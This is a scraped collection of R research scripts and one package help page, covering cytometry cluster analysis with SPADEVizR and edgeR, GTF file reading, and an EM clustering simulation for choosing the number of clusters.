stop("Error in phenoViewer: 'samples' parameter must contains only samples names\n Unknown sample names: ",
paste(setdiff(unique(samples), Results@sample.names), collapse = " "))
} else {
data <- subset(Results@cluster.phenotypes, sample %in% samples, drop = FALSE)
cluster.abundances <- Results@cluster.abundances[, samples, drop = FALSE]
}
data <- stats::na.omit(data)
clusters <- unique(clusters)
clusters.select <- data[, "Cluster"] %in% clusters
data <- data[clusters.select,]
data <- plyr::ddply(data, c("Term"), function(df) {
apply(df[, 3:ncol(df)], 2, mean, na.rm = TRUE)
})
data <- reshape2::melt(data, id = c("Term"), stringsAsFactors = FALSE)
colnames(data) <- c("samples", "marker", "value")
title <- paste("Cluster_", clusters, sep = "")
max.value <- -1
min.value <- -1
max.value <- max(c(data$value, data$upper.bound), na.rm = TRUE)
min.value <- min(c(data$value, data$lower.bound), na.rm = TRUE)
max.value <- max.value * (1 + sign(max.value) * 0.1)
min.value <- min.value * (1 - sign(min.value) * 0.1)
means <- plyr::ddply(data,
c("marker"),
function(df){mean(df$value, na.rm = TRUE)})
colnames(means) <- c("marker", "means")
data_means <- data.frame(marker = 0, means= 0, clusters = 0)
tmp_clusters<- unique(cluster.phenotypes$Cluster) ###### make sure the cluster.phenotypes file column name is "Cluster" and not "cluster"
for(i in tmp_clusters){
tmp_data<- cluster.phenotypes
tmp_clusters.select <- tmp_data[, "Cluster"] %in% i
tmp_data <- tmp_data[tmp_clusters.select,]
tmp_data <- plyr::ddply(tmp_data, c("Term"), function(df) {
apply(df[, 3:ncol(df)], 2, mean, na.rm = TRUE)
})
tmp_data <- reshape2::melt(tmp_data, id = c("Term"), stringsAsFactors = FALSE)
colnames(tmp_data) <- c("samples", "marker", "value")
tmp_means <- plyr::ddply(tmp_data,
c("marker"),
function(df){mean(df$value, na.rm = TRUE)})
colnames(tmp_means) <- c("marker", "means")
tmp_means$clusters = i
data_means = rbind(data_means, tmp_means)
}
data_means = data_means[-1, ]
rescale_data_means = data_means
rescale_means = data_means[data_means$clusters == clusters,]
plot <- ggplot2::ggplot(data = rescale_data_means) +
ggplot2::ggtitle(bquote(atop(.(title))))
plot <- plot + ggplot2::geom_line(ggplot2::aes_string(x = "marker", y = "means", group = "clusters"),
size = 0.4,
alpha = 1,
color = "#CCCCCC")+
ggplot2::scale_y_continuous(limits = c(min(data_means$means), max(data_means$means)), breaks = round(seq(0, max(data_means$means), by = 1), 0)) +
ggplot2::theme_bw()
plot <- plot + ggplot2::geom_line(data = rescale_means,
ggplot2::aes_string(x = "marker", y = "means", group = 1),
linetype = "solid",
size = 1,
color = "#FF6666")
plot <- plot + ggplot2::theme(axis.text.x = ggplot2::element_text(angle = 90, hjust = 1, vjust = 0.5, face = "bold")) +
ggplot2::theme(legend.text = ggplot2::element_text(size = 6),
legend.key = ggplot2::element_blank(),
plot.title = ggplot2::element_text(hjust=0.5)) +
ggplot2::xlab("markers") +
ggplot2::ylab("marker expressions") +
ggplot2::guides(col = ggplot2::guide_legend(ncol = 1))
grid::grid.draw(plot)
invisible(plot)
}
# Should you only want to see one cluster image
# phenoViewer_modified_v2(cluster.phenotypes = cluster.phenotypes,
# clusters = "2887")
dir.create("Grouped_ClusterImages", showWarnings = FALSE)
setwd("Grouped_ClusterImages")
a = cluster.phenotypes[which(cluster.phenotypes$Cluster %in% c(1:31)), ]
for (i in unique(a$Cluster)){
jpeg(paste("Cluster_", i, ".jpeg"),
width=2000,
height=1500,
res = 300)
phenoViewer_modified_v2(cluster.phenotypes = cluster.phenotypes,
clusters = i)
dev.off()
}
setwd(PrimaryDirectory)
##################################################
# GENERATES PHENOTYPE SHEET FOR GROUPED CLUSTERS TO BE USED FOR SPADEVIZR ANALYSIS
##################################################
# read data
Grp1_file <- "Grp 1 DR3 D51 B Cells 20181205 K=35.txt"
Grp1_data <- read.table(Grp1_file, sep = "\t", header = TRUE, stringsAsFactors = FALSE)
Grp1_data$Cluster = paste("Grp1_Cluster_", Grp1_data$Cluster, sep ="")
Grp2_file <- "Grp 2 DR3 D51 B Cells 20181205 K=26.txt"
Grp2_data <- read.table(Grp2_file, sep = "\t", header = TRUE, stringsAsFactors = FALSE)
Grp2_data$Cluster = paste("Grp2_Cluster_", Grp2_data$Cluster, sep ="")
### CHANGE to match number of markers
for(i in 4:37){
#i = 4
Grp1_min = min(Grp1_data[,i])
Grp2_min = min(Grp2_data[,i])
if(Grp1_min > Grp2_min){
correlation = Grp1_min - Grp2_min
Grp1_data[,i] = Grp1_data[,i] - correlation
}
if(Grp2_min > Grp1_min){
correlation = Grp2_min - Grp1_min
Grp2_data[,i] = Grp2_data[,i] - correlation
}
}
grouped_file = rbind(Grp1_data, Grp2_data)
# Change matching_file_name to name of .txt file that contains Group 1 Clusters and their new_name in addition to matching Group 2 Clusters and their new_name
matching_file_name = "Matched Clusters DR3 Day 51 B Cell.txt"
#grouped_file = read.table(grouped_file_name, sep = '\t', header = TRUE, stringsAsFactors = FALSE)
matching_file = read.table(matching_file_name, sep = '\t', header = TRUE, stringsAsFactors = FALSE)
matching_file = cbind(matching_file, 0)
colnames(matching_file)[3] = "Cluster_new"
for(i in 1:(nrow(matching_file)/2)){
matching_file$Cluster_new[i] = paste("Grp1_Cluster_", matching_file$Cluster[i], sep = "")
}
for(i in ((nrow(matching_file)/2)+1):nrow(matching_file)){
matching_file$Cluster_new[i] = paste("Grp2_Cluster_", matching_file$Cluster[i], sep = "")
}
matching_file = matching_file[,c(3,1,2)]
matching_file$Cluster = NULL
colnames(matching_file)[1] = "Cluster"
#match the new name
grouped_file$new_cluster_name = matching_file$new_name[match(grouped_file$Cluster, matching_file$Cluster)]
#resort the data
grouped_file = grouped_file[, c(1, 2, ncol(grouped_file), 3:(ncol(grouped_file)-1))]
#Replace NA in new_cluster_name with original cluster number
for (i in 1: nrow(grouped_file)){
if(is.na(grouped_file$new_cluster_name[i]) == TRUE){
grouped_file$new_cluster_name[i] = substr(grouped_file$Cluster[i], 1, 9)
}
}
#delete the unmatched clusters
grouped_file = grouped_file[grouped_file$new_cluster_name != "Grp1_Clus", ]
grouped_file = grouped_file[grouped_file$new_cluster_name != "Grp2_Clus", ]
grouped_file = cbind(grouped_file, 0)
colnames(grouped_file)[39] = "Cluster_new"
grouped_file = grouped_file[,c(39,1:ncol(grouped_file))]
grouped_file$Cluster = NULL
colnames(grouped_file)[1] = "Cluster"
grouped_file$Cluster = grouped_file$new_cluster_name
grouped_file$new_cluster_name = NULL
grouped_file$Cluster_new.1 = NULL
#sorting the data for better view
#grouped_file = grouped_file[order(grouped_file$new_cluster_name),]
write.xlsx(grouped_file, "Phenotype DR3 Day51 B Cells SPADEVIZR.xlsx", row.names=FALSE)
# FILE GENERATED ABOVE SERVES AS PHENOTYPE SHEET FOR SPADEVIZR ANALYSIS
##################################################
# SPADEVIZR ANALYSIS - FOR COMBINED GROUP DATA:
##################################################
### Imports Sheet 4 and Sheet 2 and renames "Abundance" and "Phenotype SpadeVizR" respectively, from desired excel file - must change path and excel file name for particular function
Abundance <- read_excel("./Abundance DR3 Day 51 B Cell Data.xlsx", sheet = "Sheet 1")
View(Abundance)
Phenotype <- read_excel("./Phenotype DR3 Day51 B Cells SPADEVIZR.xlsx", sheet = "Sheet 1")
View(Phenotype)
### Reformats data for R to run SpadeVizR Script - must change lines 334 and 338 to match size of Abundance and Phenotype Sheets (rows, columns)
cluster.abundances <- as.data.frame(Abundance[1:31,1:32])
rownames(cluster.abundances) <- cluster.abundances[,1]
cluster.abundances <- cluster.abundances[,-1]
cluster.phenotypes <- as.data.frame(Phenotype[1:961,1:37])
cluster.phenotypes <- cluster.phenotypes[,-3]
cluster.phenotypes$Cluster = paste("Cluster_", cluster.phenotypes$Cluster, sep ="")
results <- importResultsFromTables(cluster.abundances = cluster.abundances, cluster.phenotypes = cluster.phenotypes)
### Edit file names for each group based on experiment layout (can copy and paste group names from console window below to assure names are correct)
Control <- c("c05_Grp1_DR3_D51_B.Cells._37p", "c05_GRP2_DR3_Day51_B.Cells._37p", "c06_Grp1_DR3_D51_B.Cells._37p", "c06_GRP2_DR3_Day51_B.Cells._37p", "c07_Grp1_DR3_D51_B.Cells._37p", "c07_GRP2_DR3_Day51_B.Cells._37p", "c08_Grp1_DR3_D51_B.Cells._37p", "c08_GRP2_DR3_Day51_B.Cells._37p")
Naive_Chal <- c("c01_Grp1_DR3_D51_B.Cells._37p", "c02_Grp1_DR3_D51_B.Cells._37p", "c02_GRP2_DR3_Day51_B.Cells._37p", "c03_Grp1_DR3_D51_B.Cells._37p", "c03_GRP2_DR3_Day51_B.Cells._37p", "c04_Grp1_DR3_D51_B.Cells._37p", "c04_GRP2_DR3_Day51_B.Cells._37p")
Vax_Chal <- c("c09_Grp1_DR3_D51_B.Cells._37p", "c09_GRP2_DR3_Day51_B.Cells._37p", "c10_Grp1_DR3_D51_B.Cells._37p", "c10_GRP2_DR3_Day51_B.Cells._37p", "c11_Grp1_DR3_D51_B.Cells._37p", "c11_GRP2_DR3_Day51_B.Cells._37p", "c12_Grp1_DR3_D51_B.Cells._37p", "c12_GRP2_DR3_Day51_B.Cells._37p")
Vax_Unchal <- c("c13_Grp1_DR3_D51_B.Cells._37p", "c13_GRP2_DR3_Day51_B.Cells._37p", "c14_Grp1_DR3_D51_B.Cells._37p", "c14_GRP2_DR3_Day51_B.Cells._37p", "c15_Grp1_DR3_D51_B.Cells._37p", "c15_GRP2_DR3_Day51_B.Cells._37p", "c16_Grp1_DR3_D51_B.Cells._37p", "c16_GRP2_DR3_Day51_B.Cells._37p")
### Generates Volcano plots for all conditions selected
## If want to change p-value to 0.01, change "th.pvalue = 0.01"
# To run an unpaired T-test, method.paired = FALSE. To run a paired T-test use, method.paired = TRUE
### Generates CSV files for all p values for all clusters and saves them in a folder in your working directory
dir.create("SpadevizR Analysis and Volcano Plots", showWarnings = FALSE)
setwd("SpadevizR Analysis and Volcano Plots")
resultsDAC_CvNC <- identifyDAC(results, condition1 = Control, condition2 = Naive_Chal, th.pvalue = 0.05, th.fc = 1, method.paired = FALSE, use.percentages = FALSE)
resultsDAC_CvNC@results
#View(resultsDAC_CvNC@results)
write.csv(resultsDAC_CvNC@results, "Control_v_Naive_Chal_DAC_p_values.csv", row.names = FALSE)
tiff("Control vs Naive_chal.tiff",
width=2000,
height=1500,
res = 300)
SPADEVizR::plot(resultsDAC_CvNC)
dev.off()
resultsDAC_CvVU <- identifyDAC(results, condition1 = Control, condition2 = Vax_Unchal, th.pvalue = 0.05, th.fc = 1, method.paired = FALSE, use.percentages = FALSE)
resultsDAC_CvVU@results
#View(resultsDAC_CvVU@results)
write.csv(resultsDAC_CvVU@results, "Control_v_Vax_Unchal_DAC_p_values.csv", row.names = FALSE)
tiff("Control vs Vax_Unchal.tiff",
width=2000,
height=1500,
res = 300)
SPADEVizR::plot(resultsDAC_CvVU)
dev.off()
resultsDAC_NCvVC <- identifyDAC(results, condition1 = Naive_Chal, condition2 = Vax_Chal, th.pvalue = 0.05, th.fc = 1, method.paired = FALSE, use.percentages = FALSE)
resultsDAC_NCvVC@results
#View(resultsDAC_NCvVC@results)
write.csv(resultsDAC_NCvVC@results, "Naive_Chal_v_Vax_Chal_DAC_p_values.csv", row.names = FALSE)
tiff("Naive_Chal vs Vax_Chal.tiff",
width=2000,
height=1500,
res = 300)
SPADEVizR::plot(resultsDAC_NCvVC)
dev.off()
resultsDAC_VUvVC <- identifyDAC(results, condition1 = Vax_Unchal, condition2 = Vax_Chal, th.pvalue = 0.05, th.fc = 1, method.paired = FALSE, use.percentages = FALSE)
resultsDAC_VUvVC@results
#View(resultsDAC_VUvVC@results)
write.csv(resultsDAC_VUvVC@results, "Vax_Unchal_v_Vax_Chal_DAC_p_values.csv", row.names = FALSE)
tiff("Vax_Unchal vs Vax_Chal.tiff",
width=2000,
height=1500,
res = 300)
SPADEVizR::plot(resultsDAC_VUvVC)
dev.off()
resultsDAC_CvVC <- identifyDAC(results, condition1 = Control, condition2 = Vax_Chal, th.pvalue = 0.05, th.fc = 1, method.paired = FALSE, use.percentages = FALSE)
resultsDAC_CvVC@results
#View(resultsDAC_CvVC@results)
write.csv(resultsDAC_CvVC@results, "Control_v_Vax_Chal_DAC_p_values.csv", row.names = FALSE)
tiff("Control vs Vax_Chal.tiff",
width=2000,
height=1500,
res = 300)
SPADEVizR::plot(resultsDAC_CvVC)
dev.off()
resultsDAC_NCvVU <- identifyDAC(results, condition1 = Naive_Chal, condition2 = Vax_Unchal, th.pvalue = 0.05, th.fc = 1, method.paired = FALSE, use.percentages = FALSE)
resultsDAC_NCvVU@results
#View(resultsDAC_NCvVU@results)
write.csv(resultsDAC_NCvVU@results, "Naive_Chal_v_Vax_Unchal_DAC_p_values.csv", row.names = FALSE)
tiff("Naive_Chal vs Vax_Unchal.tiff",
width=2000,
height=1500,
res = 300)
SPADEVizR::plot(resultsDAC_NCvVU)
dev.off()
setwd(PrimaryDirectory)
###################################################
# Analysis with edgeR
###################################################
edgeR_analysis <- function(data_experiment, data_control, experiment_sample_size, control_sample_size, export_file_name){
#
# data_experiment = Vax_Chal.abundances
# data_control = Naive_Chal.abundances
# experiment_sample_size = 8
# control_sample_size = 7
# export_file_name = "Vax_Chal v Naive_Chal EdgeR Analysis"
tmp_cluster.abundances = cbind(data_experiment, data_control)
# Group assignment
conditions1 = rep("A", experiment_sample_size)
conditions2 = rep("B", control_sample_size)
conditions = c(conditions1, conditions2)
y <- DGEList(tmp_cluster.abundances)
## ------------------------------------------------------------------------
#Because data has been rescaled, cant use this function which removes any clusters with less than 5 cells
#keep <- aveLogCPM(y) >= aveLogCPM(5, mean(y$samples$lib.size))
#y <- y[keep,]
y = y
## ------------------------------------------------------------------------
design <- model.matrix(~factor(conditions))
y <- estimateDisp(y, design)
fit <- glmQLFit(y, design, robust=TRUE)
res <- glmQLFTest(fit, coef=2)
DAC = topTags(res, n=200, adjust.method="BH", sort.by="PValue", p.value=1)
print(DAC)
View(DAC)
write.csv(DAC, paste(export_file_name, ".csv", sep = ""),row.names = TRUE)
}
Vax_Chal.abundances = cluster.abundances[, colnames(cluster.abundances) %in% Vax_Chal]
Naive_Chal.abundances = cluster.abundances[, colnames(cluster.abundances) %in% Naive_Chal]
Control.abundances = cluster.abundances[, colnames(cluster.abundances) %in% Control]
Vax_Unchal.abundances = cluster.abundances[, colnames(cluster.abundances) %in% Vax_Unchal]
dir.create("EdgeR Analysis", showWarnings = FALSE)
setwd("EdgeR Analysis")
### Change data_experiment and data_control to sample names you want to compare as well as
### experiment_sample_size and control_sample_size to number of conditions in each sample
### finally, change export_file_name to depict groups being compared
edgeR_analysis(data_experiment = Vax_Chal.abundances,
data_control = Naive_Chal.abundances,
experiment_sample_size = 8,
control_sample_size = 7,
export_file_name = "Vax_Chal v Naive_Chal EdgeR Analysis")
edgeR_analysis(data_experiment = Vax_Chal.abundances,
data_control = Vax_Unchal.abundances,
experiment_sample_size = 8,
control_sample_size = 8,
export_file_name = "Vax_Chal v Vax_Unchal EdgeR Analysis")
edgeR_analysis(data_experiment = Control.abundances,
data_control = Naive_Chal.abundances,
experiment_sample_size = 8,
control_sample_size = 7,
export_file_name = "Control v Naive_Chal EdgeR Analysis")
edgeR_analysis(data_experiment = Control.abundances,
data_control = Vax_Unchal.abundances,
experiment_sample_size = 8,
control_sample_size = 8,
export_file_name = "Control v Vax_Unchal EdgeR Analysis")
setwd(PrimaryDirectory)
####################################
#SCATTER PLOT GENERATOR
###################################
Grouped_SheetFour <- read_excel("./Abundance DR3 Day 51 B Cell Data.xlsx", sheet = "Sheet 1")
write.table(Grouped_SheetFour, file = "Data for Scatter Plot Grouped.txt", sep = "\t",row.names = FALSE, col.names = TRUE)
#load data
data <- read.table("Data for Scatter Plot Grouped.txt", header = TRUE, sep = "\t", stringsAsFactors = FALSE)
#data$Cluster <- gsub(" ", "_", data$Cluster, fixed = TRUE)
rownames(data) <- data$Cluster
data <- data[,-1]
#transpose the data for ploting
data <- t(data)
data <- as.data.frame(data)
#group assignment
group_data <- read.table("group assignment for grouped.txt", header = TRUE, sep = "\t", stringsAsFactors = FALSE)
group_data$sample <- trim(group_data$sample)
group_data$sample = gsub(" ", ".", group_data$sample, fixed = TRUE)
data$group <- group_data$group#[match(rownames(data), group_data$sample)]
data <- data[, c(ncol(data), 1:(ncol(data)-1))]
dir.create("Grouped_Scatterplots", showWarnings = FALSE)
setwd("Grouped_Scatterplots")
x_order = factor(data$group, levels=c("Naive Unchallenged", "Naive Challenged", "Vax Unchallenged","Vax Challenged"), ordered=TRUE)
for(i in 2:ncol(data)){
scatter_plot <-
ggplot(data, aes_string(x = x_order, fill = "group", y = colnames(data)[i]))+
geom_dotplot(binaxis = "y", stackdir = "centerwhole") +
stat_summary(fun.y = "median", size=0.5, geom = 'line', aes(group=1))+
stat_summary(
fun.ymin = function(z) { quantile(z,0.25) },
fun.ymax = function(z) { quantile(z,0.75) },
fun.y = median,
width = 0.2,
geom = "errorbar") +
theme(axis.text.x = element_text(size = 25, face = "bold", vjust = 1.0, hjust = 1.0, angle = 45)) +
theme(axis.text.y = element_text(size = 20, face = "bold", vjust = 0.5, hjust = 0.5, angle = 0)) +
theme(legend.position = "none")
ggsave(scatter_plot,
width = 20,
height = 15,
dpi = 300,
filename = paste(colnames(data)[i], ".jpeg", sep = ""))
}
setwd(PrimaryDirectory)
### Displays an heatmap representation summarizing phenotypes for the overall dataset
heatmapViewer(results)
####################################################################################################################################################################################
#################################################################################################################################################################################### |
\name{RCBD}
\alias{RCBD}
\title{
Randomized Complete Block Design (RCBD)
}
\description{
A \code{list} illustrating the resources of \pkg{ScottKnott} package
related to Randomized Complete Block Design (\samp{RCBD}).
}
\usage{
data(RCBD)
RCBD
}
\details{
A simulated data to model a Randomized Complete Block Design (\samp{RCBD}) of 5
factor levels, 4 blocks and 4 factor levels repetitions one in each block.
}
\keyword{datasets}
| /man/RCBD.Rd | no_license | jcfaria/ScottKnott | R | false | false | 475 | rd | \name{RCBD}
\alias{RCBD}
\title{
Randomized Complete Block Design (RCBD)
}
\description{
A \code{list} illustrating the resources of \pkg{ScottKnott} package
related to Randomized Complete Block Design (\samp{RCBD}).
}
\usage{
data(RCBD)
RCBD
}
\details{
A simulated data to model a Randomized Complete Block Design (\samp{RCBD}) of 5
factor levels, 4 blocks and 4 factor levels repetitions one in each block.
}
\keyword{datasets}
|
##prueba_lectura_1.r
##2015-04-127dmontaner@cipf.es
##vemos velocidades de lectura
date ()
Sys.info ()[c("nodename", "user")]
commandArgs ()
rm (list = ls ())
R.version.string ##"R version 3.2.0 (2015-04-16)"
###DATOS
setwd ("../data")
dir ()
## ## R
## system.time (gtf <- read.table (file = "Homo_sapiens.GRCh38.79.gtf", header = FALSE, sep = "\t", quote = "", as.is = TRUE))
## sapply (gtf, class)
## dim (gtf)
## DATA TABLE
library (data.table)
system.time (gtf <- fread ("Homo_sapiens.GRCh38.79.gtf", header = FALSE, sep = "\t"))
sapply (gtf, class)
dim (gtf)
gtf
gtf2 <- gtf[V3=="gene"]
dim (gtf2)
write.table (gtf2, file = "gtf_gen.gtf", append = FALSE, quote = FALSE, sep = "\t", row.names = FALSE, col.names = FALSE)
###EXIT
warnings ()
sessionInfo ()
q ("no")
| /clases/2015_04_27_practical_local_blast/datos_simulacion/limpia_gtf.r | no_license | dmontaner-teaching/bioinformatics_intro_course | R | false | false | 775 | r | ##prueba_lectura_1.r
##2015-04-127dmontaner@cipf.es
##vemos velocidades de lectura
date ()
Sys.info ()[c("nodename", "user")]
commandArgs ()
rm (list = ls ())
R.version.string ##"R version 3.2.0 (2015-04-16)"
###DATOS
setwd ("../data")
dir ()
## ## R
## system.time (gtf <- read.table (file = "Homo_sapiens.GRCh38.79.gtf", header = FALSE, sep = "\t", quote = "", as.is = TRUE))
## sapply (gtf, class)
## dim (gtf)
## DATA TABLE
library (data.table)
system.time (gtf <- fread ("Homo_sapiens.GRCh38.79.gtf", header = FALSE, sep = "\t"))
sapply (gtf, class)
dim (gtf)
gtf
gtf2 <- gtf[V3=="gene"]
dim (gtf2)
write.table (gtf2, file = "gtf_gen.gtf", append = FALSE, quote = FALSE, sep = "\t", row.names = FALSE, col.names = FALSE)
###EXIT
warnings ()
sessionInfo ()
q ("no")
|
#setwd("/netscr/deelim")
setwd("C:/Users/David/Desktop/Research/EM")
source("Pan EM.R") # Pan method
library(MASS)
# Simulations to choose K
sim=100
choose_k<-rep(0,times=sim)
n=20
g=100
k=4
pi=c(0.2,0.4,0.3,0.1)
sigma=diag(k)
b=matrix(rep(0,times=k*g),nrow=g,byrow=TRUE) # initialize betas
b[1:100,]<-matrix(rep(c(10,10.5,11,9.5),times=100),nrow=100,byrow=TRUE) # Fixing the means to ensure no nondiscriminatory cases
b[1:50,]<-matrix(rep(c(9.5,9.5,9.5,9.5),times=50),nrow=50)
for(ii in 1:sim){
simulate_data=function(n,k,g,init_pi,b){
y<-matrix(rep(0,times=g*n),nrow=g) # initialize count matrix gxn #
# Prepare new flattened data
z = rmultinom(n,1,init_pi)
# while(any(rowSums(z)==0)){z=rmultinom(n,1,init_pi)} # makes sure that no one cluster simulated @ 0 membership (only good for simulations)
for(j in 1:g){
for(c in 1:k){
y[j,z[c,]==1] = rpois(sum(z[c,]==1), lambda = exp(b[j,c]))
}
}
result<-list(y=y,z=z)
return(result)
}
sim.dat<-simulate_data(n=n,k=k,g=g,init_pi=pi,b=b)
y<-sim.dat$y+1
z<-sim.dat$z
true_clusters<-rep(0,times=n)
for(i in 1:n){
true_clusters[i]<-which(z[,i]==1)
}
row_names<-paste("gene",seq(g))
col_names<-paste("subj",seq(n))
cts<-as.matrix(y)
rownames(cts)<-row_names
colnames(cts)<-col_names
coldata<-matrix(paste("cl",true_clusters,sep=""),nrow=n)
rownames(coldata)<-colnames(cts)
colnames(coldata)<-"cluster"
dds<-DESeqDataSetFromMatrix(countData = cts,
colData = coldata,
design = ~ 1)
DESeq_dds<-DESeq(dds)
size_factors<-estimateSizeFactors(dds)$sizeFactor
norm_y<-counts(DESeq_dds,normalized=TRUE)
# scaled_y<-y
# for(i in 1:n){
# scaled_y[,i]<-y[,i]/size_factors[i]
# }
######### Order Selection (using unpenalized model) ##########
source("C:/Users/David/Desktop/Research/EM/Pan EM.R")
#source("C:/Users/David/Desktop/Research/EM/unpenalized EM.R")
K_search=c(2:8)
list_BIC=matrix(0,nrow=length(K_search),ncol=2)
list_BIC[,1]=K_search
print(paste("Iteration",ii,":"))
for(aa in 1:nrow(list_BIC)){
#nam <- paste("Xpen",list_BIC[aa,1],sep="")
#assign(nam,EM(y=y,k=list_BIC[aa,1],lambda1=0,lambda2=0,tau=0,size_factors=size_factors))
list_BIC[aa,2]<-EM(y=y,k=list_BIC[aa,1],lambda1=0,lambda2=0,tau=0,size_factors=size_factors)$BIC # no penalty Pan
#list_BIC[aa,2]<-EM(y=y,k=list_BIC[aa,1],size_factors=size_factors)$BIC # unpenalized (not Pan)
print(list_BIC[aa,])
}
max_k=list_BIC[which(list_BIC[,2]==min(list_BIC[,2])),1]
choose_k[ii]<-max_k
}
table(choose_k)
# library("optCluster")
# opt.cl<-optCluster(round(scaled_y,0),2:8,clMethods="em.poisson",countData=TRUE)
########## PAN ##########
source("C:/Users/David/Desktop/Research/EM/Pan EM.R")
lambda1_search=seq(from=0.1,to=2,length.out=10)
lambda2_search=seq(from=0.1,to=2,length.out=10)
tau_search=seq(from=1,to=2,length.out=5) # nullifies tau param
list_BIC=matrix(0,nrow=length(lambda1_search)*length(lambda2_search)*length(tau_search),ncol=4) #matrix of BIC's: lambda1 and lambda2 and K, 49*5 combinations
list_BIC[,1]=rep(lambda1_search,each=length(lambda2_search)*length(tau_search))
list_BIC[,2]=rep(rep(lambda2_search,each=length(tau_search)),times=length(lambda1_search))
list_BIC[,3]=rep(tau_search,times=length(lambda1_search)*length(lambda2_search))
for(aa in 1:nrow(list_BIC)){
list_BIC[aa,4]<-EM(y=y,k=max_k,tau=list_BIC[aa,3],lambda1=list_BIC[aa,1],lambda2=list_BIC[aa,2],size_factors=size_factors)$BIC
print(list_BIC[aa,])
}
max_index<-which(list_BIC[,4]==min(list_BIC[,4]))
max_tau<-list_BIC[max_index,3]
max_lambda1<-list_BIC[max_index,1]
max_lambda2<-list_BIC[max_index,2]
#
#
#
#
#
#
#
# ######### GLMNET ########
# source("C:/Users/David/Desktop/Research/EM/group lasso EM.R")
# alpha_search=seq(from=0,to=1,by=0.2)
# lambda_search=seq(from=0,to=5,by=0.5)
# list_BIC=matrix(0,nrow=length(alpha_search)*length(lambda_search),ncol=3)
# list_BIC[,1]=rep(alpha_search,each=length(lambda_search))
# list_BIC[,2]=rep(lambda_search,times=length(alpha_search))
#
# for(aa in 1:nrow(list_BIC)){
# list_BIC[aa,3]<-EM(y=y,k=max_k,alpha=list_BIC[aa,1],lambda=list_BIC[aa,2],size_factors<-size_factors)$BIC
# print(list_BIC[aa,])
# }
#
# max_index<-which(list_BIC[,3]==min(list_BIC[,3]))
#
# max_alpha<-list_BIC[max_index,1]
# max_lambda<-list_BIC[max_index,2]
#
#
#
#
#
#
#
#
#
#
| /Simulations/real_dat_simulations.R | no_license | DavidKLim/EM | R | false | false | 4,488 | r | #setwd("/netscr/deelim")
setwd("C:/Users/David/Desktop/Research/EM")
source("Pan EM.R") # Pan method
library(MASS)
# Simulations to choose K
sim=100
choose_k<-rep(0,times=sim)
n=20
g=100
k=4
pi=c(0.2,0.4,0.3,0.1)
sigma=diag(k)
b=matrix(rep(0,times=k*g),nrow=g,byrow=TRUE) # initialize betas
b[1:100,]<-matrix(rep(c(10,10.5,11,9.5),times=100),nrow=100,byrow=TRUE) # Fixing the means to ensure no nondiscriminatory cases
b[1:50,]<-matrix(rep(c(9.5,9.5,9.5,9.5),times=50),nrow=50)
for(ii in 1:sim){
simulate_data=function(n,k,g,init_pi,b){
y<-matrix(rep(0,times=g*n),nrow=g) # initialize count matrix gxn #
# Prepare new flattened data
z = rmultinom(n,1,init_pi)
# while(any(rowSums(z)==0)){z=rmultinom(n,1,init_pi)} # makes sure that no one cluster simulated @ 0 membership (only good for simulations)
for(j in 1:g){
for(c in 1:k){
y[j,z[c,]==1] = rpois(sum(z[c,]==1), lambda = exp(b[j,c]))
}
}
result<-list(y=y,z=z)
return(result)
}
sim.dat<-simulate_data(n=n,k=k,g=g,init_pi=pi,b=b)
y<-sim.dat$y+1
z<-sim.dat$z
true_clusters<-rep(0,times=n)
for(i in 1:n){
true_clusters[i]<-which(z[,i]==1)
}
row_names<-paste("gene",seq(g))
col_names<-paste("subj",seq(n))
cts<-as.matrix(y)
rownames(cts)<-row_names
colnames(cts)<-col_names
coldata<-matrix(paste("cl",true_clusters,sep=""),nrow=n)
rownames(coldata)<-colnames(cts)
colnames(coldata)<-"cluster"
dds<-DESeqDataSetFromMatrix(countData = cts,
colData = coldata,
design = ~ 1)
DESeq_dds<-DESeq(dds)
size_factors<-estimateSizeFactors(dds)$sizeFactor
norm_y<-counts(DESeq_dds,normalized=TRUE)
# scaled_y<-y
# for(i in 1:n){
# scaled_y[,i]<-y[,i]/size_factors[i]
# }
######### Order Selection (using unpenalized model) ##########
source("C:/Users/David/Desktop/Research/EM/Pan EM.R")
#source("C:/Users/David/Desktop/Research/EM/unpenalized EM.R")
K_search=c(2:8)
list_BIC=matrix(0,nrow=length(K_search),ncol=2)
list_BIC[,1]=K_search
print(paste("Iteration",ii,":"))
for(aa in 1:nrow(list_BIC)){
#nam <- paste("Xpen",list_BIC[aa,1],sep="")
#assign(nam,EM(y=y,k=list_BIC[aa,1],lambda1=0,lambda2=0,tau=0,size_factors=size_factors))
list_BIC[aa,2]<-EM(y=y,k=list_BIC[aa,1],lambda1=0,lambda2=0,tau=0,size_factors=size_factors)$BIC # no penalty Pan
#list_BIC[aa,2]<-EM(y=y,k=list_BIC[aa,1],size_factors=size_factors)$BIC # unpenalized (not Pan)
print(list_BIC[aa,])
}
max_k=list_BIC[which(list_BIC[,2]==min(list_BIC[,2])),1]
choose_k[ii]<-max_k
}
table(choose_k)
# library("optCluster")
# opt.cl<-optCluster(round(scaled_y,0),2:8,clMethods="em.poisson",countData=TRUE)
########## PAN ##########
source("C:/Users/David/Desktop/Research/EM/Pan EM.R")
lambda1_search=seq(from=0.1,to=2,length.out=10)
lambda2_search=seq(from=0.1,to=2,length.out=10)
tau_search=seq(from=1,to=2,length.out=5) # nullifies tau param
list_BIC=matrix(0,nrow=length(lambda1_search)*length(lambda2_search)*length(tau_search),ncol=4) #matrix of BIC's: lambda1 and lambda2 and K, 49*5 combinations
list_BIC[,1]=rep(lambda1_search,each=length(lambda2_search)*length(tau_search))
list_BIC[,2]=rep(rep(lambda2_search,each=length(tau_search)),times=length(lambda1_search))
list_BIC[,3]=rep(tau_search,times=length(lambda1_search)*length(lambda2_search))
for(aa in 1:nrow(list_BIC)){
list_BIC[aa,4]<-EM(y=y,k=max_k,tau=list_BIC[aa,3],lambda1=list_BIC[aa,1],lambda2=list_BIC[aa,2],size_factors=size_factors)$BIC
print(list_BIC[aa,])
}
max_index<-which(list_BIC[,4]==min(list_BIC[,4]))
max_tau<-list_BIC[max_index,3]
max_lambda1<-list_BIC[max_index,1]
max_lambda2<-list_BIC[max_index,2]
#
#
#
#
#
#
#
# ######### GLMNET ########
# source("C:/Users/David/Desktop/Research/EM/group lasso EM.R")
# alpha_search=seq(from=0,to=1,by=0.2)
# lambda_search=seq(from=0,to=5,by=0.5)
# list_BIC=matrix(0,nrow=length(alpha_search)*length(lambda_search),ncol=3)
# list_BIC[,1]=rep(alpha_search,each=length(lambda_search))
# list_BIC[,2]=rep(lambda_search,times=length(alpha_search))
#
# for(aa in 1:nrow(list_BIC)){
